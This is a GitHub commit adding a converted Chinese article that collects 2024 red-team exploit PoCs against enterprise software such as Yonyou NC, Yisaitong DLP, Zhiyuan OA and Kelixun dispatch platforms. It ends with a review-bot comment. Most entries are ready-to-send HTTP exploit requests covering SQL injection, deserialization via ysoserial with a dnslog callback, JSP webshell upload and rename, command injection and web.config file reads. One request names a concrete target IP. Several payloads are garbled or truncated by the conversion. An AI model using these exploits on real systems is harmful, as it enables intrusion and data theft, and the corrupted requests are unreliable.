
Commit

Permalink
Upload new file: 2024HW 情报合集(二)附 poc.md via simpread
MrWQ committed Jul 25, 2024
1 parent 9fb0555 commit 6005090
Showing 1 changed file with 214 additions and 0 deletions.
214 changes: 214 additions & 0 deletions hw/2024hw/2024HW 情报合集(二)附 poc.md
@@ -0,0 +1,214 @@
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/clB6P1_DT4eMuURPMv-FBg)
**免责声明**

<table width="677"><tbody><tr><td valign="top" rowspan="5" colspan="1"><strong><strong>本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!</strong></strong></td></tr><tr></tr><tr></tr><tr></tr><tr></tr></tbody></table>

各位大师傅不好意思,经发现下面 poc 有错,已增加和更新部分 poc。

一、SuiteCRM responseEntryPoint 存在 SQL 注入漏洞

```
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

二、亿赛通数据泄露防护 (DLP) 系统 NetSecConfigAjax 接口存在 SQL 注入漏洞

```
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
```

三、亿赛通数据泄露防护 (DLP) 系统 NoticeAjax 接口存在 SQL 注入漏洞

```
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host:
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
command=delNotice¬iceId=123';if(select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'--
```

四、用友 U8 Cloud MonitorServlet 存在反序列化漏洞

```
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
payload
```

五、用友 NC 系统 blobRefClassSearch 接口中 pk_org 参数的 sql 注入漏洞

poc 暂未公布。

六、用友 NC querygoodsgridbycode 存在 SQL 注入漏洞

```
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
```

七、通天星 CMSV6 车载定位监控平台 disable 存在 SQL 注入

```
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+ 2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
```

八、通天星主动安全监控云平台远程代码执行漏洞

poc 暂未公布。

九、润乾报表 InputServlet 存在任意文件上传漏洞

```
POST /InputServlet?action=12 HTTP/1.1
Host: 120.55.41.98:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=00contentOboundary00
Connection: close
Content-Length: 238
--00contentOboundary00
Content-Disposition: form-data;
1024
--00contentOboundary00
Content-Disposition: form-data; /\..\\..\\..\12.jsp"
Content-Type: image/jpeg
test
--00contentOboundary00--
```

十、天问物业 ERP 系统 AreaAvatarDownLoad 存在任意文件读取漏洞

```
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
```

十一、 致远 OA fileUpload.do 前台文件上传绕过漏洞

1、上传图片马,返回 fileid 值

```
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)
Content-Length: 754
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
png
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
false
--00content0boundary00
Content-Disposition: form-data; Content-Type: Content-Type: application/pdf
<% out.println("hello");%>
--00content0boundary00--
```

2、修改文件后缀为 jsp

```
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Content-Length: 64
method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp
```

十二、福建科立讯通信 指挥调度平台 invite_one_member 存在远程命令执行漏洞

```
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60ech o%20test%3Etest.txt%60 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

十三、福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞

```
POST /app/ext/ajax_users.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
```

十四、福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞

```
/app/ext/ajax_users.php
```

十五、锐捷 RG-NBS2026G-P 交换机 WEB 管理 ping.htm 未授权访问漏洞  

```
/safety/ping.htm
```

        关注公众号:**实战安全研究**
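Review bot: the 润乾报表 InputServlet entry (section 九) carries a concrete address, `Host: 120.55.41.98:6868`, while every other request in the file leaves `Host:` blank; it should be blanked the same way so the published file does not name what looks like a live test target. Smaller points in the same hunk: the disclaimer is pasted as a raw HTML `<table>` with doubled `<strong>` tags inside a markdown file and would read better as a plain blockquote; in the 致远 OA entry the `Content-Type: multipart/form-data; boundary=...` and `User-Agent:` headers have been run together on one line; and the multipart entries (InputServlet, 致远 OA) have lost the attributes of their `Content-Disposition` lines while keeping the original `Content-Length` values, so the bodies no longer match their declared lengths. These look like artifacts of the SimpRead conversion named in the first line, so the file should be checked against the original post rather than trusted as pasted.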
